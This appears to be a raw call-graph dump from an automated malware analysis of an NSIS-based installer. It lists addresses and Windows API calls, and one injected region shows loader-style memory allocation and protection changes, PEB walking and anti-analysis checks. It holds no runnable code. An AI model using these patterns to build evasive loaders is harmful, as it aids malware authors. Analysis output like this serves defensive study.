402bbb 8773->8775 8778 402b7a 8774->8778 8775->8768 8776 402bbf IIDFromString 8775->8776 8776->8768 8777 402bce 8776->8777 8777->8768 8783 40653d lstrcpynW 8777->8783 8782 406484 wsprintfW 8778->8782 8780 402beb CoTaskMemFree 8780->8768 8782->8768 8783->8780 7565 40175c 7566 402da6 17 API calls 7565->7566 7567 401763 7566->7567 7571 40605c 7567->7571 7569 40176a 7570 40605c 2 API calls 7569->7570 7570->7569 7572 406069 GetTickCount GetTempFileNameW 7571->7572 7573 4060a3 7572->7573 7574 40609f 7572->7574 7573->7569 7574->7572 7574->7573 8794 401563 8795 402ba4 8794->8795 8798 406484 wsprintfW 8795->8798 8797 402ba9 8798->8797 8841 401968 8842 402d84 17 API calls 8841->8842 8843 40196f 8842->8843 8844 402d84 17 API calls 8843->8844 8845 40197c 8844->8845 8846 402da6 17 API calls 8845->8846 8847 401993 lstrlenW 8846->8847 8848 4019a4 8847->8848 8849 4019e5 8848->8849 8853 40653d lstrcpynW 8848->8853 8851 4019d5 8851->8849 8852 4019da lstrlenW 8851->8852 8852->8849 8853->8851 7912 2abc485 7913 2abc48a K32EnumDeviceDrivers 7912->7913 7914 40176f 7915 402da6 17 API calls 7914->7915 7916 401776 7915->7916 7917 401796 7916->7917 7918 40179e 7916->7918 7953 40653d lstrcpynW 7917->7953 7954 40653d lstrcpynW 7918->7954 7921 40179c 7924 4067c4 5 API calls 7921->7924 7922 4017a9 7923 405e0c 3 API calls 7922->7923 7925 4017af lstrcatW 7923->7925 7940 4017bb 7924->7940 7925->7921 7926 406873 2 API calls 7926->7940 7927 406008 2 API calls 7927->7940 7929 4017cd CompareFileTime 7929->7940 7930 40188d 7931 40559f 24 API calls 7930->7931 7933 401897 7931->7933 7932 40653d lstrcpynW 7932->7940 7935 4032b4 31 API calls 7933->7935 7934 40559f 24 API calls 7942 401879 7934->7942 7936 4018aa 7935->7936 7937 4018be SetFileTime 7936->7937 7939 4018d0 CloseHandle 7936->7939 7937->7939 7938 40657a 17 API calls 7938->7940 7941 4018e1 7939->7941 7939->7942 7940->7926 7940->7927 7940->7929 7940->7930 7940->7932 7940->7938 7947 405b9d MessageBoxIndirectW 7940->7947 7951 401864 7940->7951 7952 40602d GetFileAttributesW CreateFileW 7940->7952 7943 4018e6 7941->7943 7944 4018f9 7941->7944 7945 40657a 17 API calls 7943->7945 7946 40657a 17 API calls 7944->7946 7948 4018ee lstrcatW 7945->7948 7949 401901 7946->7949 7947->7940 7948->7949 7949->7942 7950 405b9d MessageBoxIndirectW 7949->7950 7950->7942 7951->7934 7951->7942 7952->7940 7953->7921 7954->7922 6922 2aa8bea 6923 2aa8bef 6922->6923 6923->6923 6926 2aa91c6 6923->6926 6927 2aa91cc 6926->6927 6930 2aa9263 6927->6930 6939 2ab9db7 6930->6939 6932 2aa9284 6933 2aa92f7 6932->6933 6945 2ab906b 6932->6945 6935 2ab906b 2 API calls 6933->6935 6936 2aa9309 6935->6936 6951 2aa9319 6936->6951 6940 2ab9df9 6939->6940 6941 2ab906b 2 API calls 6940->6941 6944 2aba0e3 6940->6944 6942 2ab9ee4 NtAllocateVirtualMemory 6941->6942 6942->6944 6944->6932 6947 2ab90ea 6945->6947 6946 2ab913b LoadLibraryA 6949 2ab9147 6946->6949 6947->6946 6954 2ab98fa GetPEB 6947->6954 6949->6933 6950 2ab912e 6950->6946 6956 2abc485 6951->6956 6955 2ab9913 6954->6955 6955->6950 6958 2abc48a 6956->6958 6959 2abc4e8 6958->6959 6960 2abc60c 6959->6960 6961 2abc5aa K32EnumDeviceDrivers 6959->6961 6961->6960 7195 713c2a7f 7196 713c2acf 7195->7196 7197 713c2a8f VirtualProtect 7195->7197 7197->7196 7198 402c05 SendMessageW 7199 402c2a 7198->7199 7200 402c1f InvalidateRect 7198->7200 7200->7199 9002 40190c 9003 401943 9002->9003 9004 402da6 17 API calls 9003->9004 9005 401948 9004->9005 9006 405c49 67 API calls 9005->9006 9007 401951 9006->9007 8336 40261c 8337 402da6 17 API calls 8336->8337 8338 402623 8337->8338 8341 40602d GetFileAttributesW CreateFileW 8338->8341 8340 40262f 8341->8340 7659 40252a 7660 402de6 17 API calls 7659->7660 7661 402534 7660->7661 7662 402da6 17 API calls 7661->7662 7663 40253d 7662->7663 7664 402548 RegQueryValueExW 7663->7664 7669 40292e 7663->7669 7665 40256e RegCloseKey 7664->7665 7666 402568 7664->7666 7665->7669 7666->7665 7670 406484 wsprintfW 7666->7670 7670->7665 7671 40352d SetErrorMode GetVersionExW 7672 4035b7 7671->7672 7673 40357f GetVersionExW 7671->7673 7674 403610 7672->7674 7675 40690a 5 API calls 7672->7675 7673->7672 7676 40689a 3 API calls 7674->7676 7675->7674 7677 403626 lstrlenA 7676->7677 7677->7674 7678 403636 7677->7678 7679 40690a 5 API calls 7678->7679 7680 40363d 7679->7680 7681 40690a 5 API calls 7680->7681 7682 403644 7681->7682 7683 40690a 5 API calls 7682->7683 7684 403650 #17 OleInitialize SHGetFileInfoW 7683->7684 7762 40653d lstrcpynW 7684->7762 7687 40369d GetCommandLineW 7763 40653d lstrcpynW 7687->7763 7689 4036af 7690 405e39 CharNextW 7689->7690 7691 4036d5 CharNextW 7690->7691 7700 4036e6 7691->7700 7692 4037e4 7693 4037f8 GetTempPathW 7692->7693 7764 4034fc 7693->7764 7695 403810 7697 403814 GetWindowsDirectoryW lstrcatW 7695->7697 7698 40386a DeleteFileW 7695->7698 7696 405e39 CharNextW 7696->7700 7701 4034fc 12 API calls 7697->7701 7774 40307d GetTickCount GetModuleFileNameW 7698->7774 7700->7692 7700->7696 7704 4037e6 7700->7704 7702 403830 7701->7702 7702->7698 7703 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7702->7703 7706 4034fc 12 API calls 7703->7706 7858 40653d lstrcpynW 7704->7858 7705 403941 7866 403b12 7705->7866 7711 403862 7706->7711 7707 40387d 7707->7705 7708 403932 7707->7708 7712 405e39 CharNextW 7707->7712 7802 403bec 7708->7802 7711->7698 7711->7705 7729 40389f 7712->7729 7715 403a69 7873 405b9d 7715->7873 7716 403a7e 7718 403a86 GetCurrentProcess OpenProcessToken 7716->7718 7719 403afc ExitProcess 7716->7719 7723 403acc 7718->7723 7724 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 7718->7724 7720 403908 7726 405f14 18 API calls 7720->7726 7721 403949 7728 405b08 5 API calls 7721->7728 7727 40690a 5 API calls 7723->7727 7724->7723 7730 403914 7726->7730 7731 403ad3 7727->7731 7732 40394e lstrcatW 7728->7732 7729->7720 7729->7721 7730->7705 7859 40653d lstrcpynW 7730->7859 7733 403ae8 ExitWindowsEx 7731->7733 7738 403af5 7731->7738 7734 40396a lstrcatW lstrcmpiW 7732->7734 7735 40395f lstrcatW 7732->7735 7733->7719 7733->7738 7734->7705 7736 40398a 7734->7736 7735->7734 7739 403996 7736->7739 7740 40398f 7736->7740 7742 40140b 2 API calls 7738->7742 7744 405aeb 2 API calls 7739->7744 7743 405a6e 4 API calls 7740->7743 7741 403927 7860 40653d lstrcpynW 7741->7860 7742->7719 7746 403994 7743->7746 7747 40399b SetCurrentDirectoryW 7744->7747 7746->7747 7748 4039b8 7747->7748 7749 4039ad 7747->7749 7862 40653d lstrcpynW 7748->7862 7861 40653d lstrcpynW 7749->7861 7752 40657a 17 API calls 7753 4039fa DeleteFileW 7752->7753 7754 403a06 CopyFileW 7753->7754 7759 4039c5 7753->7759 7754->7759 7755 403a50 7757 4062fd 36 API calls 7755->7757 7756 4062fd 36 API calls 7756->7759 7757->7705 7758 40657a 17 API calls 7758->7759 7759->7752 7759->7755 7759->7756 7759->7758 7761 403a3a CloseHandle 7759->7761 7863 405b20 CreateProcessW 7759->7863 7761->7759 7762->7687 7763->7689 7765 4067c4 5 API calls 7764->7765 7767 403508 7765->7767 7766 403512 7766->7695 7767->7766 7768 405e0c 3 API calls 7767->7768 7769 40351a 7768->7769 7770 405aeb 2 API calls 7769->7770 7771 403520 7770->7771 7772 40605c 2 API calls 7771->7772 7773 40352b 7772->7773 7773->7695 7877 40602d GetFileAttributesW CreateFileW 7774->7877 7776 4030bd 7795 4030cd 7776->7795 7878 40653d lstrcpynW 7776->7878 7778 4030e3 7779 405e58 2 API calls 7778->7779 7780 4030e9 7779->7780 7879 40653d lstrcpynW 7780->7879 7782 4030f4 GetFileSize 7783 4031ee 7782->7783 7801 40310b 7782->7801 7880 403019 7783->7880 7785 4031f7 7787 403227 GlobalAlloc 7785->7787 7785->7795 7892 4034e5 SetFilePointer 7785->7892 7786 4034cf ReadFile 7786->7801 7891 4034e5 SetFilePointer 7787->7891 7788 40325a 7792 403019 6 API calls 7788->7792 7791 403242 7794 4032b4 31 API calls 7791->7794 7792->7795 7793 403210 7796 4034cf ReadFile 7793->7796 7799 40324e 7794->7799 7795->7707 7798 40321b 7796->7798 7797 403019 6 API calls 7797->7801 7798->7787 7798->7795 7799->7795 7799->7799 7800 40328b SetFilePointer 7799->7800 7800->7795 7801->7783 7801->7786 7801->7788 7801->7795 7801->7797 7803 40690a 5 API calls 7802->7803 7804 403c00 7803->7804 7805 403c06 7804->7805 7806 403c18 7804->7806 7905 406484 wsprintfW 7805->7905 7807 40640b 3 API calls 7806->7807 7808 403c48 7807->7808 7809 403c67 lstrcatW 7808->7809 7812 40640b 3 API calls 7808->7812 7811 403c16 7809->7811 7897 403ec2 7811->7897 7812->7809 7815 405f14 18 API calls 7816 403c99 7815->7816 7817 403d2d 7816->7817 7820 40640b 3 API calls 7816->7820 7818 405f14 18 API calls 7817->7818 7819 403d33 7818->7819 7821 403d43 LoadImageW 7819->7821 7823 40657a 17 API calls 7819->7823 7822 403ccb 7820->7822 7824 403de9 7821->7824 7825 403d6a RegisterClassW 7821->7825 7822->7817 7826 403cec lstrlenW 7822->7826 7830 405e39 CharNextW 7822->7830 7823->7821 7829 40140b 2 API calls 7824->7829 7827 403da0 SystemParametersInfoW CreateWindowExW 7825->7827 7828 403df3 7825->7828 7831 403d20 7826->7831 7832 403cfa lstrcmpiW 7826->7832 7827->7824 7828->7705 7833 403def 7829->7833 7834 403ce9 7830->7834 7836 405e0c 3 API calls 7831->7836 7832->7831 7835 403d0a GetFileAttributesW 7832->7835 7833->7828 7838 403ec2 18 API calls 7833->7838 7834->7826 7837 403d16 7835->7837 7839 403d26 7836->7839 7837->7831 7840 405e58 2 API calls 7837->7840 7841 403e00 7838->7841 7906 40653d lstrcpynW 7839->7906 7840->7831 7843 403e0c ShowWindow 7841->7843 7844 403e8f 7841->7844 7846 40689a 3 API calls 7843->7846 7845 405672 5 API calls 7844->7845 7847 403e95 7845->7847 7848 403e24 7846->7848 7850 403eb1 7847->7850 7851 403e99 7847->7851 7849 403e32 GetClassInfoW 7848->7849 7852 40689a 3 API calls 7848->7852 7854 403e46 GetClassInfoW RegisterClassW 7849->7854 7855 403e5c DialogBoxParamW 7849->7855 7853 40140b 2 API calls 7850->7853 7851->7828 7857 40140b 2 API calls 7851->7857 7852->7849 7853->7828 7854->7855 7856 40140b 2 API calls 7855->7856 7856->7828 7857->7828 7858->7693 7859->7741 7860->7708 7861->7748 7862->7759 7864 405b53 CloseHandle 7863->7864 7865 405b5f 7863->7865 7864->7865 7865->7759 7867 403b2a 7866->7867 7868 403b1c CloseHandle 7866->7868 7908 403b57 7867->7908 7868->7867 7871 405c49 67 API calls 7872 403a5e OleUninitialize 7871->7872 7872->7715 7872->7716 7874 405bb2 7873->7874 7875 403a76 ExitProcess 7874->7875 7876 405bc6 MessageBoxIndirectW 7874->7876 7876->7875 7877->7776 7878->7778 7879->7782 7881 403022 7880->7881 7882 40303a 7880->7882 7883 403032 7881->7883 7884 40302b DestroyWindow 7881->7884 7885 403042 7882->7885 7886 40304a GetTickCount 7882->7886 7883->7785 7884->7883 7893 406946 7885->7893 7888 403058 CreateDialogParamW ShowWindow 7886->7888 7889 40307b 7886->7889 7888->7889 7889->7785 7891->7791 7892->7793 7894 406963 PeekMessageW 7893->7894 7895 403048 7894->7895 7896 406959 DispatchMessageW 7894->7896 7895->7785 7896->7894 7898 403ed6 7897->7898 7907 406484 wsprintfW 7898->7907 7900 403f47 7901 403f7b 18 API calls 7900->7901 7903 403f4c 7901->7903 7902 403c77 7902->7815 7903->7902 7904 40657a 17 API calls 7903->7904 7904->7903 7905->7811 7906->7817 7907->7900 7909 403b65 7908->7909 7910 403b2f 7909->7910 7911 403b6a FreeLibrary GlobalFree 7909->7911 7910->7871 7911->7910 7911->7911 8023 402434 8024 402467 8023->8024 8025 40243c 8023->8025 8026 402da6 17 API calls 8024->8026 8027 402de6 17 API calls 8025->8027 8028 40246e 8026->8028 8029 402443 8027->8029 8035 402e64 8028->8035 8031 40244d 8029->8031 8033 40247b 8029->8033 8032 402da6 17 API calls 8031->8032 8034 402454 RegDeleteValueW RegCloseKey 8032->8034 8034->8033 8036 402e71 8035->8036 8037 402e78 8035->8037 8036->8033 8037->8036 8039 402ea9 8037->8039 8040 4063aa RegOpenKeyExW 8039->8040 8041 402ed7 8040->8041 8042 402ee7 RegEnumValueW 8041->8042 8043 402f0a 8041->8043 8050 402f81 8041->8050 8042->8043 8044 402f71 RegCloseKey 8042->8044 8043->8044 8045 402f46 RegEnumKeyW 8043->8045 8046 402f4f RegCloseKey 8043->8046 8049 402ea9 6 API calls 8043->8049 8044->8050 8045->8043 8045->8046 8047 40690a 5 API calls 8046->8047 8048 402f5f 8047->8048 8048->8050 8051 402f63 RegDeleteKeyW 8048->8051 8049->8043 8050->8036 8051->8050 8066 2aab0d7 8067 2aaaf3a 8066->8067 8067->8066 8067->8067 8068 2abaa81 4 API calls 8067->8068 8071 2aab295 8067->8071 8069 2abaa7c 8068->8069 8070 2abaa81 4 API calls 8069->8070 8070->8069 8415 40263e 8416 402652 8415->8416 8417 40266d 8415->8417 8418 402d84 17 API calls 8416->8418 8419 402672 8417->8419 8420 40269d 8417->8420 8428 402659 8418->8428 8421 402da6 17 API calls 8419->8421 8422 402da6 17 API calls 8420->8422 8424 402679 8421->8424 8423 4026a4 lstrlenW 8422->8423 8423->8428 8432 40655f WideCharToMultiByte 8424->8432 8426 40268d lstrlenA 8426->8428 8427 4026e7 8428->8427 8431 4026d1 8428->8431 8433 40610e SetFilePointer 8428->8433 8429 4060df WriteFile 8429->8427 8431->8427 8431->8429 8432->8426 8434 40612a 8433->8434 8437 406142 8433->8437 8435 4060b0 ReadFile 8434->8435 8436 406136 8435->8436 8436->8437 8438 406173 SetFilePointer 8436->8438 8439 40614b SetFilePointer 8436->8439 8437->8431 8438->8437 8439->8438 8440 406156 8439->8440 8441 4060df WriteFile 8440->8441 8441->8437 7152 4015c1 7153 402da6 17 API calls 7152->7153 7154 4015c8 7153->7154 7155 405eb7 4 API calls 7154->7155 7167 4015d1 7155->7167 7156 401631 7158 401636 7156->7158 7160 401663 7156->7160 7157 405e39 CharNextW 7157->7167 7179 401423 7158->7179 7162 401423 24 API calls 7160->7162 7168 40165b 7162->7168 7166 40164a SetCurrentDirectoryW 7166->7168 7167->7156 7167->7157 7169 401617 GetFileAttributesW 7167->7169 7171 405b08 7167->7171 7174 405a6e CreateDirectoryW 7167->7174 7183 405aeb CreateDirectoryW 7167->7183 7169->7167 7186 40690a GetModuleHandleA 7171->7186 7175 405abb 7174->7175 7176 405abf GetLastError 7174->7176 7175->7167 7176->7175 7177 405ace SetFileSecurityW 7176->7177 7177->7175 7178 405ae4 GetLastError 7177->7178 7178->7175 7180 40559f 24 API calls 7179->7180 7181 401431 7180->7181 7182 40653d lstrcpynW 7181->7182 7182->7166 7184 405afb 7183->7184 7185 405aff GetLastError 7183->7185 7184->7167 7185->7184 7187 406930 GetProcAddress 7186->7187 7188 406926 7186->7188 7190 405b0f 7187->7190 7192 40689a GetSystemDirectoryW 7188->7192 7190->7167 7191 40692c 7191->7187 7191->7190 7194 4068bc wsprintfW LoadLibraryExW 7192->7194 7194->7191 7253 4014cb 7254 40559f 24 API calls 7253->7254 7255 4014d2 7254->7255 8474 4016cc 8475 402da6 17 API calls 8474->8475 8476 4016d2 GetFullPathNameW 8475->8476 8477 4016ec 8476->8477 8483 40170e 8476->8483 8480 406873 2 API calls 8477->8480 8477->8483 8478 401723 GetShortPathNameW 8479 402c2a 8478->8479 8481 4016fe 8480->8481 8481->8483 8484 40653d lstrcpynW 8481->8484 8483->8478 8483->8479 8484->8483 7256 2aa9f39 7257 2aa9f1b 7256->7257 7258 2aa9f41 EnumWindows 7256->7258 7257->7256 7259 4014d7 7260 402d84 17 API calls 7259->7260 7261 4014dd Sleep 7260->7261 7263 402c2a 7261->7263 7264 4020d8 7265 4020ea 7264->7265 7275 40219c 7264->7275 7266 402da6 17 API calls 7265->7266 7267 4020f1 7266->7267 7269 402da6 17 API calls 7267->7269 7268 401423 24 API calls 7271 4022f6 7268->7271 7270 4020fa 7269->7270 7272 402110 LoadLibraryExW 7270->7272 7273 402102 GetModuleHandleW 7270->7273 7274 402121 7272->7274 7272->7275 7273->7272 7273->7274 7287 406979 7274->7287 7275->7268 7278 402132 7281 402151 7278->7281 7282 40213a 7278->7282 7279 40216b 7280 40559f 24 API calls 7279->7280 7283 402142 7280->7283 7292 713c1817 7281->7292 7284 401423 24 API calls 7282->7284 7283->7271 7285 40218e FreeLibrary 7283->7285 7284->7283 7285->7271 7334 40655f WideCharToMultiByte 7287->7334 7289 406996 7290 40699d GetProcAddress 7289->7290 7291 40212c 7289->7291 7290->7291 7291->7278 7291->7279 7293 713c184a 7292->7293 7335 713c1bff 7293->7335 7295 713c1851 7296 713c1976 7295->7296 7297 713c1869 7295->7297 7298 713c1862 7295->7298 7296->7283 7367 713c2480 7297->7367 7383 713c243e 7298->7383 7303 713c18cd 7309 713c191e 7303->7309 7310 713c18d3 7303->7310 7304 713c18af 7396 713c2655 7304->7396 7305 713c187f 7308 713c1885 7305->7308 7314 713c1890 7305->7314 7306 713c1898 7320 713c188e 7306->7320 7393 713c2e23 7306->7393 7308->7320 7377 713c2b98 7308->7377 7312 713c2655 10 API calls 7309->7312 7415 713c1666 7310->7415 7318 713c190f 7312->7318 7313 713c18b5 7407 713c1654 7313->7407 7387 713c2810 7314->7387 7333 713c1965 7318->7333 7421 713c2618 7318->7421 7320->7303 7320->7304 7322 713c2655 10 API calls 7322->7318 7324 713c1896 7324->7320 7326 713c196f GlobalFree 7326->7296 7330 713c1951 7330->7333 7425 713c15dd wsprintfW 7330->7425 7331 713c194a FreeLibrary 7331->7330 7333->7296 7333->7326 7334->7289 7428 713c12bb GlobalAlloc 7335->7428 7337 713c1c26 7429 713c12bb GlobalAlloc 7337->7429 7339 713c1e6b GlobalFree GlobalFree GlobalFree 7340 713c1e88 7339->7340 7353 713c1ed2 7339->7353 7341 713c227e 7340->7341 7350 713c1e9d 7340->7350 7340->7353 7343 713c22a0 GetModuleHandleW 7341->7343 7341->7353 7342 713c1d26 GlobalAlloc 7349 713c1c31 7342->7349 7346 713c22c6 7343->7346 7347 713c22b1 LoadLibraryW 7343->7347 7344 713c1d71 lstrcpyW 7348 713c1d7b lstrcpyW 7344->7348 7345 713c1d8f GlobalFree 7345->7349 7436 713c16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 7346->7436 7347->7346 7347->7353 7348->7349 7349->7339 7349->7342 7349->7344 7349->7345 7349->7348 7352 713c2126 7349->7352 7349->7353 7360 713c2067 GlobalFree 7349->7360 7361 713c21ae 7349->7361 7362 713c12cc 2 API calls 7349->7362 7430 713c162f GlobalSize GlobalAlloc 7349->7430 7350->7353 7432 713c12cc 7350->7432 7435 713c12bb GlobalAlloc 7352->7435 7353->7295 7354 713c2318 7354->7353 7356 713c2325 lstrlenW 7354->7356 7437 713c16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 7356->7437 7358 713c22d8 7358->7354 7366 713c2302 GetProcAddress 7358->7366 7360->7349 7361->7353 7365 713c2216 lstrcpyW 7361->7365 7362->7349 7363 713c212f 7363->7295 7365->7353 7366->7354 7369 713c2498 7367->7369 7368 713c12cc GlobalAlloc lstrcpynW 7368->7369 7369->7368 7371 713c25c1 GlobalFree 7369->7371 7372 713c256b GlobalAlloc CLSIDFromString 7369->7372 7373 713c2540 GlobalAlloc WideCharToMultiByte 7369->7373 7376 713c258a 7369->7376 7439 713c135a 7369->7439 7371->7369 7374 713c186f 7371->7374 7372->7371 7373->7371 7374->7305 7374->7306 7374->7320 7376->7371 7443 713c27a4 7376->7443 7378 713c2baa 7377->7378 7379 713c2c4f HeapCreate 7378->7379 7382 713c2c6d 7379->7382 7381 713c2d39 7381->7320 7446 713c2b42 7382->7446 7384 713c2453 7383->7384 7385 713c245e GlobalAlloc 7384->7385 7386 713c1868 7384->7386 7385->7384 7386->7297 7391 713c2840 7387->7391 7388 713c28ee 7390 713c28f4 GlobalSize 7388->7390 7392 713c28fe 7388->7392 7389 713c28db GlobalAlloc 7389->7392 7390->7392 7391->7388 7391->7389 7392->7324 7395 713c2e2e 7393->7395 7394 713c2e6e GlobalFree 7395->7394 7450 713c12bb GlobalAlloc 7396->7450 7398 713c26d8 MultiByteToWideChar 7403 713c265f 7398->7403 7399 713c26fa StringFromGUID2 7399->7403 7400 713c270b lstrcpynW 7400->7403 7401 713c2742 GlobalFree 7401->7403 7402 713c271e wsprintfW 7402->7403 7403->7398 7403->7399 7403->7400 7403->7401 7403->7402 7404 713c2777 GlobalFree 7403->7404 7405 713c1312 2 API calls 7403->7405 7451 713c1381 7403->7451 7404->7313 7405->7403 7455 713c12bb GlobalAlloc 7407->7455 7409 713c1659 7410 713c1666 2 API calls 7409->7410 7411 713c1663 7410->7411 7412 713c1312 7411->7412 7413 713c131b GlobalAlloc lstrcpynW 7412->7413 7414 713c1355 GlobalFree 7412->7414 7413->7414 7414->7318 7416 713c169f lstrcpyW 7415->7416 7417 713c1672 wsprintfW 7415->7417 7420 713c16b8 7416->7420 7417->7420 7420->7322 7422 713c2626 7421->7422 7424 713c1931 7421->7424 7423 713c2642 GlobalFree 7422->7423 7422->7424 7423->7422 7424->7330 7424->7331 7426 713c1312 2 API calls 7425->7426 7427 713c15fe 7426->7427 7427->7333 7428->7337 7429->7349 7431 713c164d 7430->7431 7431->7349 7438 713c12bb GlobalAlloc 7432->7438 7434 713c12db lstrcpynW 7434->7353 7435->7363 7436->7358 7437->7353 7438->7434 7440 713c1361 7439->7440 7441 713c12cc 2 API calls 7440->7441 7442 713c137f 7441->7442 7442->7369 7444 713c2808 7443->7444 7445 713c27b2 VirtualAlloc 7443->7445 7444->7376 7445->7444 7447 713c2b4d 7446->7447 7448 713c2b5d 7447->7448 7449 713c2b52 GetLastError 7447->7449 7448->7381 7449->7448 7450->7403 7452 713c13ac 7451->7452 7453 713c138a 7451->7453 7452->7403 7453->7452 7454 713c1390 lstrcpyW 7453->7454 7454->7452 7455->7409 7575 401ede 7576 402d84 17 API calls 7575->7576 7577 401ee4 7576->7577 7578 402d84 17 API calls 7577->7578 7579 401ef0 7578->7579 7580 401f07 EnableWindow 7579->7580 7581 401efc ShowWindow 7579->7581 7582 402c2a 7580->7582 7581->7582 7583 4056de 7584 405888 7583->7584 7585 4056ff GetDlgItem GetDlgItem GetDlgItem 7583->7585 7587 405891 GetDlgItem CreateThread CloseHandle 7584->7587 7588 4058b9 7584->7588 7629 4044ce SendMessageW 7585->7629 7587->7588 7632 405672 OleInitialize 7587->7632 7589 4058e4 7588->7589 7591 4058d0 ShowWindow ShowWindow 7588->7591 7592 405909 7588->7592 7593 4058f0 7589->7593 7594 405944 7589->7594 7590 40576f 7599 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 7590->7599 7631 4044ce SendMessageW 7591->7631 7598 404500 8 API calls 7592->7598 7596 4058f8 7593->7596 7597 40591e ShowWindow 7593->7597 7594->7592 7602 405952 SendMessageW 7594->7602 7603 404472 SendMessageW 7596->7603 7605 405930 7597->7605 7606 40593e 7597->7606 7604 405917 7598->7604 7600 4057e4 7599->7600 7601 4057c8 SendMessageW SendMessageW 7599->7601 7607 4057f7 7600->7607 7608 4057e9 SendMessageW 7600->7608 7601->7600 7602->7604 7609 40596b CreatePopupMenu 7602->7609 7603->7592 7610 40559f 24 API calls 7605->7610 7611 404472 SendMessageW 7606->7611 7613 404499 18 API calls 7607->7613 7608->7607 7612 40657a 17 API calls 7609->7612 7610->7606 7611->7594 7614 40597b AppendMenuW 7612->7614 7615 405807 7613->7615 7616 405998 GetWindowRect 7614->7616 7617 4059ab TrackPopupMenu 7614->7617 7618 405810 ShowWindow 7615->7618 7619 405844 GetDlgItem SendMessageW 7615->7619 7616->7617 7617->7604 7620 4059c6 7617->7620 7621 405833 7618->7621 7622 405826 ShowWindow 7618->7622 7619->7604 7623 40586b SendMessageW SendMessageW 7619->7623 7624 4059e2 SendMessageW 7620->7624 7630 4044ce SendMessageW 7621->7630 7622->7621 7623->7604 7624->7624 7625 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 7624->7625 7627 405a24 SendMessageW 7625->7627 7627->7627 7628 405a4d GlobalUnlock SetClipboardData CloseClipboard 7627->7628 7628->7604 7629->7590 7630->7619 7631->7589 7633 4044e5 SendMessageW 7632->7633 7636 405695 7633->7636 7634 4056bc 7635 4044e5 SendMessageW 7634->7635 7637 4056ce OleUninitialize 7635->7637 7636->7634 7638 401389 2 API calls 7636->7638 7638->7636 7965 2aa9e19 7968 2aa9e25 7965->7968 7967 2aa9e73 7969 2ab906b 2 API calls 7967->7969 7970 2aa9e8f 7968->7970 7971 2abaf38 7968->7971 7969->7970 7972 2ab906b 2 API calls 7971->7972 7973 2abaf4c 7972->7973 7974 2ab906b 2 API calls 7973->7974 7975 2abafa1 7974->7975 7976 2abafac GetPEB 7975->7976 7977 2abb02f 7976->7977 8004 2abbebc 7977->8004 7979 2abb073 7980 2abb916 7979->7980 7984 2aaa114 7979->7984 7988 2abb405 7979->7988 7986 2abb9f5 7980->7986 7993 2abbc30 7980->7993 7981 2abbe74 7982 2abbebc NtProtectVirtualMemory 7981->7982 7985 2abbeb6 7982->7985 7983 2ab2f2f 7983->7967 7984->7967 7984->7983 7987 2ab9db7 3 API calls 7984->7987 7990 2ab906b 2 API calls 7984->7990 7992 2ab84bd 7984->7992 7985->7967 7989 2abbebc NtProtectVirtualMemory 7986->7989 7987->7984 7996 2abbebc NtProtectVirtualMemory 7988->7996 7991 2abbbe9 7989->7991 7990->7984 7991->7967 8001 2ab85c4 7992->8001 7993->7981 7993->7984 7995 2ab852e 7997 2ab85c0 7995->7997 8007 2abaa81 7995->8007 7996->7984 7997->7967 8002 2ab8642 CreateFileA 8001->8002 8002->7995 8005 2abbf32 NtProtectVirtualMemory 8004->8005 8005->7979 8008 2abaad4 8007->8008 8011 2abab40 8008->8011 8010 2abadce 8015 2aaa18e 8011->8015 8012 2ab9db7 3 API calls 8012->8015 8013 2ab2f2f 8013->8010 8014 2ab84bd 8016 2ab85c4 CreateFileA 8014->8016 8015->8010 8015->8012 8015->8013 8015->8014 8018 2ab906b 2 API calls 8015->8018 8017 2ab852e 8016->8017 8019 2ab85c0 8017->8019 8020 2abaa81 4 API calls 8017->8020 8018->8015 8019->8010 8021 2abaa7c 8020->8021 8022 2abaa81 4 API calls 8021->8022 8022->8021 8052 2aab01e 8053 2aab022 8052->8053 8054 2aaafb8 8052->8054 8055 2abaa81 4 API calls 8053->8055 8058 2aab034 8053->8058 8056 2abaa7c 8055->8056 8057 2abaa81 4 API calls 8056->8057 8057->8056 8058->8058 8059 4023f4 8060 402da6 17 API calls 8059->8060 8061 402403 8060->8061 8062 402da6 17 API calls 8061->8062 8063 40240c 8062->8063 8064 402da6 17 API calls 8063->8064 8065 402416 GetPrivateProfileStringW 8064->8065 9185 401ff6 9186 402da6 17 API calls 9185->9186 9187 401ffd 9186->9187 9188 406873 2 API calls 9187->9188 9189 402003 9188->9189 9191 402014 9189->9191 9192 406484 wsprintfW 9189->9192 9192->9191 9193 2aaaf16 9194 2aaaf22 9193->9194 9196 2aaaf27 9193->9196 9195 2ab9db7 3 API calls 9194->9195 9195->9196 7201 40248a 7202 402da6 17 API calls 7201->7202 7203 40249c 7202->7203 7204 402da6 17 API calls 7203->7204 7205 4024a6 7204->7205 7218 402e36 7205->7218 7208 402c2a 7209 4024de 7211 4024ea 7209->7211 7242 402d84 7209->7242 7210 402da6 17 API calls 7212 4024d4 lstrlenW 7210->7212 7214 402509 RegSetValueExW 7211->7214 7222 4032b4 7211->7222 7212->7209 7216 40251f RegCloseKey 7214->7216 7216->7208 7219 402e51 7218->7219 7245 4063d8 7219->7245 7223 4032cd 7222->7223 7224 4032fb 7223->7224 7252 4034e5 SetFilePointer 7223->7252 7249 4034cf 7224->7249 7228 403468 7230 4034aa 7228->7230 7235 40346c 7228->7235 7229 403318 GetTickCount 7231 403452 7229->7231 7238 403367 7229->7238 7232 4034cf ReadFile 7230->7232 7231->7214 7232->7231 7233 4034cf ReadFile 7233->7238 7234 4034cf ReadFile 7234->7235 7235->7231 7235->7234 7236 4060df WriteFile 7235->7236 7236->7235 7237 4033bd GetTickCount 7237->7238 7238->7231 7238->7233 7238->7237 7239 4033e2 MulDiv wsprintfW 7238->7239 7241 4060df WriteFile 7238->7241 7240 40559f 24 API calls 7239->7240 7240->7238 7241->7238 7243 40657a 17 API calls 7242->7243 7244 402d99 7243->7244 7244->7211 7246 4063e7 7245->7246 7247 4063f2 RegCreateKeyExW 7246->7247 7248 4024b6 7246->7248 7247->7248 7248->7208 7248->7209 7248->7210 7250 4060b0 ReadFile 7249->7250 7251 403306 7250->7251 7251->7228 7251->7229 7251->7231 7252->7224 7456 403f9a 7457 403fb2 7456->7457 7458 404113 